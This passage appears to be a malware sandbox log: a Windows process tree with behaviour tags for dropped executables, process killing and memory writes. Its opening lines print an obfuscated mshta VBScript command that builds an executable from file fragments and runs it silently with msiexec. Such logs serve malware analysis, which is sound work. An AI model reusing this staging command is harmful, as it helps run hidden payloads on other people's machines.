C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )6⤵PID:4052
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY7⤵PID:4908
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"8⤵PID:4696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵PID:3332
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY8⤵PID:5128
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "D9RJLCLd2f8688ZYCUxUkMQi.exe" -F5⤵
- Kills process with taskkill
PID:3716
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\iJ_zxQndnIcJiYyrXyCpQokM.exe"C:\Users\Admin\Pictures\Adobe Films\iJ_zxQndnIcJiYyrXyCpQokM.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5364 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵PID:4516
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵PID:5092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5036 -ip 50361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5352
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2680 -ip 26801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4624 -ip 46241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 768 -ip 7681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5948
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 4492 -ip 44921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3184 -ip 31841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 4196 -ip 41961⤵PID:2148
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1476 -ip 14761⤵PID:5820
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4752 -ip 47521⤵PID:2368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4076 -ip 40761⤵PID:5248
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4640 -ip 46401⤵PID:5468
-
C:\Users\Admin\AppData\Local\Temp\D85F.exeC:\Users\Admin\AppData\Local\Temp\D85F.exe1⤵PID:3800
-
C:\Users\Admin\AppData\Local\Temp\D85F.exeC:\Users\Admin\AppData\Local\Temp\D85F.exe2⤵PID:5392
-
-
C:\Users\Admin\AppData\Local\Temp\3064.exeC:\Users\Admin\AppData\Local\Temp\3064.exe1⤵PID:228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 3002⤵
- Program crash
PID:4696
-
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 0bcb9e75efbef4f1243f5b3517ed512a YmKvmH36f0CNISNa9eIUHg.0.1.0.3.01⤵PID:3056
-
C:\Users\Admin\AppData\Local\Temp\43ED.exeC:\Users\Admin\AppData\Local\Temp\43ED.exe1⤵PID:5260
-
C:\Users\Admin\AppData\Local\Temp\43ED.exeC:\Users\Admin\AppData\Local\Temp\43ED.exe2⤵PID:3204
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 228 -ip 2281⤵PID:3684
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\5553.dll1⤵PID:1372
-
C:\Users\Admin\AppData\Local\Temp\73D8.exeC:\Users\Admin\AppData\Local\Temp\73D8.exe1⤵PID:1672
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2360 -ip 23601⤵PID:5756
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 4080 -ip 40801⤵PID:3480
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 5044 -ip 50441⤵PID:5920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 876 -p 1672 -ip 16721⤵PID:1156